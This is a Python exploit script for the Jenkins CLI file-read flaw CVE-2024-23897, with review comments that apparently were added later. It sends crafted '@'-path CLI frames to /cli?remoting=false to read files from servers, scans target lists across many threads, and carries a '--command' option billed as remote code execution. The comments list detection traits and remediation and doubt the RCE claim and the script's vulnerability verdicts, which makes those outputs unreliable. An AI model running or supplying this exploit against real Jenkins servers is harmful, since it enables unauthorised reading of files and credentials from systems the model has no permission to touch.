import requests
import argparse
import uuid
import urllib.parse
import os
from sys import stdout
from colorama import Fore, init
import concurrent.futures
# Short aliases for the colorama foreground colours used in the console output.
FR, FY, FG, FW = Fore.RED, Fore.YELLOW, Fore.GREEN, Fore.WHITE

# autoreset=True: colorama resets the colour after each print call.
init(autoreset=True)

# A single module-level requests.Session; every method of CVE_2024_23897 posts
# through it, including the calls made from the thread pool in find_until_die.
session = requests.Session()
def clear():
    """Clear the terminal: runs ``clear`` on POSIX systems, ``cls`` elsewhere."""
    shell_command = 'clear' if os.name == 'posix' else 'cls'
    os.system(shell_command)
def banners():
    """Clear the terminal, then print the banner, credit lines and CVE title.

    Purely cosmetic: nothing here touches the network. The strings are kept
    exactly as found on the page.
    """
    clear()
    stdout.write(" \n")
    # ASCII-art logo, written in light red.
    stdout.write(""+Fore.LIGHTRED_EX +"██╗ ███████╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗███████╗\n")
    stdout.write(""+Fore.LIGHTRED_EX +"██║ ██╔════╝██╔══██╗██╔══██╗ ╚════██╗ ██╔══██╗██╔════╝██╔════╝\n")
    stdout.write(""+Fore.LIGHTRED_EX +"██║ █████╗ ███████║██║ ██║█████╗ █████╔╝█████╗██████╔╝██║ █████╗ \n")
    stdout.write(""+Fore.LIGHTRED_EX +"██║ ██╔══╝ ██╔══██║██║ ██║╚════╝██╔═══╝ ╚════╝██╔══██╗██║ ██╔══╝\n")
    stdout.write(""+Fore.LIGHTRED_EX +"███████╗███████╗██║ ██║██████╔╝ ███████╗ ██║ ██║╚██████╗███████╗\n")
    stdout.write(""+Fore.LIGHTRED_EX +"╚══════╝╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝\n")
    # Box-drawn credit panel; "\x1b[38;2;255;20;147m" is a raw 24-bit colour
    # escape written directly instead of going through colorama.
    stdout.write(""+Fore.YELLOW +"═════════════╦═════════════════════════════════╦══════════════════════════════\n")
    stdout.write(""+Fore.YELLOW +"╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n")
    stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"AUTHOR "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" PARI MALAM "+Fore.YELLOW+"║\n")
    stdout.write(""+Fore.YELLOW +"╔════════════════════════════════════════════════════════════════════════════╝\n")
    stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"GITHUB "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" GITHUB.COM/THATNOTEASY "+Fore.YELLOW+"║\n")
    stdout.write(""+Fore.YELLOW +"╚════════════════════════════════════════════════════════════════════════════╝\n")
    # Title line: the "Leading to RCE" wording is the script author's claim.
    print(f"{Fore.YELLOW}[CVE-2024-23897] - {Fore.GREEN}Jenkins Arbitrary File Read Vulnerability Leading to RCE\n")
# Import-time side effect: the terminal is cleared and the banner printed as
# soon as this module is loaded, before any argument parsing happens.
banners()
class CVE_2024_23897:
    """Client for the Jenkins CLI HTTP endpoint, written around CVE-2024-23897.

    Reviewer notes for analysts reading this script:

    * Every request is a POST to ``/cli?remoting=false`` with a ``Session``
      header (a random UUID) and a ``Side`` header. Those headers on that path,
      together with an ``@``-prefixed argument in the uploaded body, are the
      network-visible traits of this script and are what to look for in proxy
      or access logs.
    * No method checks the HTTP status code or inspects the response body, so
      the console output is not evidence that a host is or is not affected.
    * Remediation is on the server side: upgrade Jenkins to a release that
      contains the fix described in the Jenkins security advisory for this
      CVE; that advisory also covers restricting CLI access as a workaround.
    """

    def __init__(self, output_file=None, command=None) -> None:
        """Store the run options.

        Args:
            output_file: Path that save_response appends response bodies to;
                nothing is written when it is falsy.
            command: Optional string that beduk hands to execute_command.
        """
        self.output_file = output_file
        self.command = command
        # Set to None here and not used anywhere else in this class.
        self.urls = None
        self.ips = None

    def prefix_scheme(self, url):
        """Return url with ``http://`` prepended unless it already starts with
        ``http://`` or ``https://`` (the comparison is case-sensitive)."""
        if not url.startswith('http://') and not url.startswith('https://'):
            url = 'http://' + url
        return url

    def donlod(self, target_info, uuid_str):
        """POST the "download" side of the CLI session and print the reply.

        Args:
            target_info: Result of urllib.parse.urlparse; only ``scheme`` and
                ``netloc`` are read, so any path in the input URL is dropped.
            uuid_str: Value sent in the ``Session`` header.
        """
        try:
            headers = {"Session": uuid_str, "Side": "download"}
            response = session.post(f"{target_info.scheme}://{target_info.netloc}/cli?remoting=false", headers=headers)
            # The body is printed and saved whatever the status code is; a
            # printed body alone does not show that file content was returned.
            print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FG}{response.content}{Fore.RESET}")
            print(f"{FR}.++===============================================================================================================++.{Fore.RESET}")
            self.save_response(response.content)
        except Exception as e:
            # Every exception (connection failure, decode error raised inside
            # save_response, ...) ends up here, so "Not Vulnerable" is not a
            # reliable negative result.
            print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FR}Not Vulnerable :P{Fore.RESET}")

    def oplod(self, target_info, uuid_str, data):
        """POST the "upload" side of the CLI session with data as the body.

        Args:
            target_info: Result of urllib.parse.urlparse; only ``scheme`` and
                ``netloc`` are read.
            uuid_str: Value sent in the ``Session`` header.
            data: Bytes sent as an ``application/octet-stream`` request body.
        """
        try:
            headers = {"Session": uuid_str, "Side": "upload", "Content-type": "application/octet-stream"}
            response = session.post(f"{target_info.scheme}://{target_info.netloc}/cli?remoting=false", headers=headers, data=data)
            # Printed and saved regardless of status code, as in donlod.
            print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FG}{response.content}")
            print(f"{FR}.++===============================================================================================================++.{Fore.RESET}")
            self.save_response(response.content)
        except Exception as e:
            # Catch-all: any failure is reported with the same message.
            print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FR}Not Vulnerable :P{Fore.RESET}")

    def save_response(self, content):
        """Append content, decoded and followed by a newline, to the output file.

        Does nothing when ``self.output_file`` is falsy. ``content.decode()``
        uses the default codec, so a body that is not valid UTF-8 raises
        UnicodeDecodeError, which the calling method's ``except`` absorbs.
        """
        if self.output_file:
            # Append mode: earlier runs are kept; no explicit file encoding.
            with open(self.output_file, 'a') as f:
                f.write(content.decode() + '\n')

    def execute_command(self, target_info, uuid_str):
        """POST ``self.command`` to the CLI endpoint with ``Side: command``.

        NOTE(review): nothing in this file establishes that the server acts on
        a ``Side`` value of "command"; to my knowledge the endpoint's protocol
        uses only the download and upload sides - confirm before treating the
        "[LEAD-2-RCE]" label as more than the script author's wording.
        """
        try:
            headers = {"Session": uuid_str, "Side": "command"}
            response = session.post(f"{target_info.scheme}://{target_info.netloc}/cli?remoting=false", headers=headers, data=self.command.encode())
            # Whatever the server answers is echoed; this is not proof that
            # anything ran on the target.
            print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FG}{response.content}")
            print(f"{FR}.++===============================================================================================================++.{Fore.RESET}")
            self.save_response(response.content)
        except Exception as e:
            # Catch-all: any failure is reported with the same message.
            print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FR}Not Vulnerable :P{Fore.RESET}")

    def beduk(self, target_url, file_path):
        """Issue the upload, download and optional command requests for one target.

        The three requests are sent one after another from the calling thread
        and share one freshly generated ``Session`` UUID.

        Args:
            target_url: Host or URL; prefix_scheme adds ``http://`` if missing.
            file_path: String placed after ``@`` in the uploaded body.
        """
        formatted_url = self.prefix_scheme(target_url)
        target_info = urllib.parse.urlparse(formatted_url)
        uuid_str = str(uuid.uuid4())
        # NOTE(review): looks like Jenkins CLI argument frames - the literals
        # "help", "@" + file_path, "GBK" and "en_US" are visible in the bytes,
        # but the frame semantics are not established by this file. Presumably
        # the "@<path>" argument is the part tied to the CVE's file read.
        data = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + file_path.encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
        self.oplod(target_info, uuid_str, data)
        self.donlod(target_info, uuid_str)
        if self.command:
            self.execute_command(target_info, uuid_str)

    def find_until_die(self, file_path, num_threads):
        """Run beduk for every line of a local file using a thread pool.

        Args:
            file_path: Local file read line by line as the target list; the
                same value is also passed to beduk as its ``file_path``.
            num_threads: ``max_workers`` of the ThreadPoolExecutor.
        """
        with open(file_path, 'r') as file:
            targets = [self.prefix_scheme(line.strip()) for line in file.readlines()]
        with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
            # Map each future back to its target so failures can be attributed.
            future_to_url = {executor.submit(self.beduk, target, file_path): target for target in targets}
            for future in concurrent.futures.as_completed(future_to_url):
                url = future_to_url[future]
                try:
                    future.result()
                except Exception as exc:
                    # Only exceptions raised outside the request helpers reach
                    # this point; the helpers catch their own.
                    print(f"{FR}Error processing {url}: {exc}")
def main():
    """Command-line entry point: parse the options and run one of two modes.

    With ``--url`` a single target goes through ``beduk``; without it
    ``find_until_die`` walks the file named by ``--filename`` using
    ``--threads`` workers. ``--filename`` is mandatory and is handed on
    unchanged in both modes.
    """
    cli = argparse.ArgumentParser(description='Exploit script for CVE-2024-23897.')

    # (flags, keyword settings) for each option, registered in this order.
    option_table = (
        (('-u', '--url'), {'help': 'Single target URL.'}),
        (('-f', '--filename'), {'required': True, 'help': 'File containing list of IPs or URLs.'}),
        (('-t', '--threads'), {'type': int, 'default': 5, 'help': 'Number of threads for concurrent execution. Default is 5.'}),
        (('-o', '--output'), {'help': 'Output file to save successful responses.'}),
        (('-c', '--command'), {'help': 'Command to execute on the target system.'}),
    )
    for flags, settings in option_table:
        cli.add_argument(*flags, **settings)
    opts = cli.parse_args()

    runner = CVE_2024_23897(output_file=opts.output, command=opts.command)
    if not opts.url:
        runner.find_until_die(opts.filename, opts.threads)
        return
    runner.beduk(opts.url, opts.filename)
# Argument parsing and requests start only when the file is run as a script;
# the module-level banners() call still executes on a plain import.
if __name__ == "__main__":
    main()